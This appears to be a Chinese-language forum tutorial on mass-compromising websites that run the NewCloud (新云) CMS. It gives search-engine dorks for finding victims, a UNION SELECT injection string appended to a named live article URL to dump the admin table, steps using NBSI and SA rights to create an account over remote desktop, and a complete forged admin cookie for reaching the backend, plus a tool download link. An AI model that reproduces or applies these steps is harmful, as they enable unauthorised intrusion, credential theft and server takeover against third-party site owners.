大家好~今天给你们做个教程 叫批量入侵新云到获得WEBSHELL
先声明 ,这个漏洞是我在 www.hackins.net 里发现的漏洞 我不是做广告。
由于我没做准备 ,我就现在开始吧~
先到baidu或google搜索 :首页连接(首页连接日IP>15000,次页连接无流量限制,欢迎合作连接
我们就随便找吧`这个漏洞只要 没改后台和注册 就能入侵 前面的 我搞了几个`我们就找后面点的吧
反正多的是 新云的 晕`卡 这个 试下后台改了没 默认后台地址admin/admin_login.asp
OK 没改``我们注册个号 在点发布文章 在点文章管理 由健 属性
http://www.18236.com/user/articlelist.asp?action=view&channelid=1&ArticleID=1655 这个地址就是注入点了
什么? 你不信``那好我们来看下吧 不由你不信 看到了吧``在把
union select 1,2 ,password,4,5, username,7,8,9 from nc_admin where id=1 这段复制到文章地址后面
就能暴出管理员密 码了 晕 是SQL 的 Provider for SQL Server 我们用工具 如果是ACCESS的数据库
就能马上得到管理员的MD5密码 还有就是 新云的表名是nc_admin 有人问`为什么要登陆呢 因为你没登陆
是不能看文章的不能看文章工具就不能暴到注入点了 晕``工具出错了 SA权限 太好了 用NBSI吧
还真卡~ 看下有没开 3389 有开的话就爽了 有开`我们试着建个号 这些命令不用我说了吧 好了
我们登陆看下 看到了吧```那么快就得到了一个 服务器权限 现在你想做什么都OK了 网速慢。。
教程先暂停 ==我带你们 入侵新云 ACCESS 数据库类型的网站 因为我没事先做准备 现在刚好弄到有SA权限
的网站 是运气哈~
对了 我想注册个动画吧的号 我早就想加入了 可一直没机会 。不知道管理员能不能通融下。联系方式
默认后台地址。。。admin/admin_login.asp
随便选一款可以修改COOKIE信息的工具就可以了。。
http://dodo1.126.tofor.com/cookie.rar
ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminID=1&Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce%2CAdminLog%2CSendMessage%2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1%2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%2CAdminUpload1%2CAdminSelect1%2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2%2CComment2%2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2%2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%2CSpecial3%2CCreateShop3%2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5%2CAdminArticle5%2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5%2CAdminUpload5%2CAdminSelect5%2CAuditing5%2CDownServer5%2CAddUser%2CAdminUser%2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect%2CSoftCollect%2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData%2CSpaceSize%2CBatchReplace&AdminGrade=999&AdminPass=9f7fa2c6858e1e77&RandomCode=3N263U7hgb314iwb&AdminName=admin
这个是新云cookie值。。后台登陆的。
我们来修改 name 和adminpass
用拿到的密码替换COOKIE信息里的。。
admin/admin_index.asp 是新云的后台管理页面。。